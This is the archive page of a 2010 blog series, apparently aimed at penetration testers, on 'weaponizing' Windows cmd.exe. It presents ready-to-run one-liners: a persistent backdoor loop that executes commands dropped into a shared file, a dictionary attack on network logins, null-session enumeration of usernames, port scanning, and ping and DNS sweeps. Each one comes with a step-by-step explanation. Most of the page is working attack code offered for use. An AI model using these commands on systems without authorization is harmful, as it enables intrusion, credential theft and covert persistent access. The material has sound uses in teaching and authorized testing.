Category Archives: Weaponizing cmd.exe

Discovering Domain Password Lockout Policy

1
Posted by Skyler on September 16, 2010 – 7:10 pm
Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

Here is a quick little command to discover the command lockout policy of your domain. This is useful when performing password attacks. The worst thing that you could do to lose credibility is to DoS your client by locking out all of their user accounts.

C:\> net accounts /domain
The request will be processed at a domain controller for domain TEST.


Force user logoff how long after time expires?:       Never


Minimum password age (days):                          0


Maximum password age (days):                          Unlimited


Minimum password length:                              0


Length of password history maintained:                None


Lockout threshold:                                    10


Lockout duration (minutes):                           30


Lockout observation window (minutes):                 30


Computer role:                                        BACKUP


The command completed successfully.

Enjoy!

Weaponizing cmd.exe – Backdoor Shell

2
Posted by Skyler on August 31, 2010 – 7:53 am
Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

When I saw this, I was very much impressed. To culminate our weaponizing.cmd series, we finish up with post-exploitation processes.

Backdoor

Setting Up The Backdoor

C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j
 >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

How It Works:

First, we create an infinite loop. This will make the backdoor persistent.

for /L %i in (1,0,2)

We use commands.txt for our input. We will iterate through those commands, delimiting between objects by using a newline (^).

do (for /f "delims=^" %j in (commands.txt)

For each object found in commands.txt, execute it in a command shell. Then output results to output.txt

do cmd.exe /c %j >> output.txt

After execution, delete commands.txt so it is clear for the next command

& del commands.txt

We then ping ourselves twice to create a wait sequence in our infinite loop

& ping -n 2 127.0.0.1

Interacting With The Backdoor

To interact with the backdoor, we can simply echo data into commands.txt, and print out output.txt via network shares.

Execute Command:
echo <cmd> \\<ip>\<share>\commands.txt
Read Results:
type \\<ip>\<share>\output.txt

It is pretty straight forward! You could easily create a batch file to automate the writing of the command, waiting for it to complete, typing out the results, and then deleting the results file. Here is a simple single command batch file:

::cmdcat.bat <args>


::Interacts with cmd.exe backdoor


::


@ECHO OFF


echo %1 \\<ip>\<share>\commands.txt


ping -n 2 127.0.0.1


type \\<ip>\<share>\output.txt


del \\<ip>\<share>\output.txt

Another implementation would be a client-like script. It would remove the need to hard code in the IP and Share information. It could just be passed initially and then the batch would wait for command input.

Weaponizing cmd.exe – Port Scanning

0
Posted by Skyler on August 30, 2010 – 8:39 am
Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

To continue, here a nice way to port scan from the command line. This is an Ed Skoudis trick.

The problem is that the windows telnet client horribly handles connections, and is severely limited when trying to use it in scripts. The fix is to use ftp instead. It is built in to windows, and has some functionality that allows us to overcome some of the limitations that exist in the telnet client.

Port Scanner

C:\> for /L %i in (1,1,1024) do echo Checking port %i: >> ports.txt & echo open
<target_id> %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>> ports.txt

How it works

Create a basic loop for the range of ports you want to scan

for /L %i in (1,1,1024)

Echo out a message indicating what port is being scanned, and output it into a file called ports.txt

do echo Checking port %i: >> ports.txt

Now echo the ftp command:  open <ip> <port> into a file called ftp.txt

& echo open <target_id> %i > ftp.txt

Issue the FTP command: quit  into that same file

& echo quit >> ftp.txt

Open the ftp client, using the text within ftp.txt as its list of commands. This does the actual scan attempt.



& ftp -s:ftp.txt

Redirect standard error int ports.txt file. This is where the results will go. The status of the return error will determine if the port is open.

2>> ports.txt

Truly clever. Hats off to Ed Skoudis.

Weaponizing cmd.exe – UN/PW Guessing

0
Posted by Skyler on August 27, 2010 – 1:15 pm
Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

This is a fantastic way to automate a dictionary attack on windows net accounts. This is part of my salute to Pentesting Ninjitsu.

UN/PW Guessing

for /f %i in (knownUsers.txt) do @(for /f %j in (passwordList.txt) do @echo %i:%j
& @net use \\<ip> %j /u:%i 2> nul && echo %i:%j >> success.txt && net use \\<ip /del)
how it works
This looks messy, but this is how it works:
  • Create a for look that iterates over items (note, not a /L) in users.txt list of users
for /f %i in (knownUsers.txt)
  • for each user in the list, do another for loop that iterates through a list of passwords in pass.txt
do @(for /f %j in (passwordList.txt)
  • print out the username:password combonation being tested
do @echo %i:%j
  • for each of those passwords, try to establish a session using the currently selected password, for the currently selected user
& @net use \\<ip> %j /u:%i
  • All errors (failed logins) are discarded
2> nul
  • If and ONLY if the command succeeds, append the username:password combo to successfulLogins.txt
&& echo %i:%j >> successfulLogins.txt
  • Again, if that login was succesful, we now need to destroy that session to be able to keep testing
&& net use \\<ip /del)

This is a fantastic tool. Have fun!

Weaponizing cmd.exe – Enumerate users (inspite of RestrictAnonymous)

0
Posted by Skyler on August 26, 2010 – 6:01 am
Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

Okay. Continuing on with the series. Now that we have  mapped the network, we need to enumerate users on the active hosts. Often times you will be preforming a Penetration Test on a windows machine. In the event that the machine has RestrictAnonymous set, you may find it difficult to enumerate users using your null session. It is important to note that this does not make it impossible! tools like enum rely upon the null session enumeration option,  therefore RestrictAnonymous = 2 ruins the use of that tool (and others like it). I am going to show you a method to brute force usernames in a different manner. For this you will need two tools, sid2user, and user2sid. You can get them here.

Step 1: Establish a Null Session



C:\> net use \\<target_ip> "" /u:""

It is important to note that although RestrictAnonymous is set to 2, that does not prevent null sessions. It simply prevents the enumeration of users via null sessions.

Step 2: Determine Target Machine’s name

There are many methods to get this. Here is one:

C:\> nbtstat -a <target_ip>

Step 3: Aquire SID

C:\> user2sid \\<target_ip> <machine_name>

This will return to us the machines SID (Security Identifier). The SID is a unique number for each user/system. It follows the following format:

S-[Revision-Level]-[Authority Level]-[Domain-or-Computer-number]-[RID]

Example (brackets added for clarity): S-[1]-[5-21]-[165875785-1005667432-441284377]-[1023]

The RID is the number which represents the user ID. We use this to get their usernames.

Step 4: Aquire Admin account name

500 is the admin account, which allows us to identify the true admin even if the account name has been renamed. With that being known, you can manually determine the admin using sid2user.

C:\> sid2user \\<target_ip> <SID_with_RID_set_to_500>

For example, the SID with the RID set to 500 would look like:

S-1-5-21-165875785-1005667432-441284377-500

Step 5: Aquire Other Users

C:\> for /L %u in (1000,1,1015) do @sid2user \\<target_ip> <SID_without_RID> %u

This loop will brute force usernames by retrieving the usernames associated with RIDs 1000-1015. You can change this according to your needs.

There you go! now you can go on to password cracking, etc!

Weaponizing cmd.exe – DNS Reverse Lookup

2
Posted by Skyler on August 25, 2010 – 6:12 am
Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

Continuing on with the “weaponizing cmd.exe” series, we have already enumerated live hosts. Now lets get som more information using DNS reverse lookup. We use the nslookup <ip> command to do it.

DNS Reverse Lookup

for /L %i in (1,1,255) do @nslookup x.x.x.%i 2> nul | find "Name" && @echo x.x.x.%i
How it works
  • Do a for loop, using an integer that will be initialized to 1, and iterate by 1 until it equals 255

for /L %i in (1,1,255)
  • for each iteration do a dns reverse lookup for the next address on the subnet

do @nslookup x.x.x.%i
  • If I get an error, discard the results

2> nul
  • With all other results, output the line containing “Name”

| find "Name"
  • If and only if the lookup returns without errors, print the ip of the machine

&& @echo x.x.x.%i

Its pretty nice for enumeration. Have fun!

Weaponizing cmd.exe – Ping Sweep

0
Posted by Skyler on August 24, 2010 – 5:05 am
Filed under Fu (a.k.a Tips), Weaponizing cmd.exe
This is part of my tribute to PenTesting Ninjitsu. Here is a nice quick way to perform a ping sweep from the windows command line.
Ping Sweep
for \L %i in (1,1,255) do @ping -n 1 x.x.x.%i | find "Reply"

how it works

This command is built in the following way:
  • create a loop using a variable called %i
for \L %i
  • The loop should iterate %i by first initializing it by one, then iterating it by 1 until it hits 255
%i in (1,1,255)
  • The action performed will be to send 1 ping request to the ip address, where the last octet is equal to the value of %i (@ makes sure it doesnt echo the command back)
do @ping -n 1 x.x.x.%i
  • I only want to find the results that contain a reply message, indicating open an active host (Cast sensitive)
| find "Reply"

The results will show you the lines of a ping command containing the IP of hosts on the subnet. I.E



Reply from 192.168.1.2: bytes=32 time<1ms TTL=128

Reply from 192.168.1.15: bytes=32 time<1ms TTL=128

Reply from 192.168.1.117: bytes=32 time<1ms TTL=128

Enjoy!

Bad Behavior has blocked 275 access attempts in the last 7 days.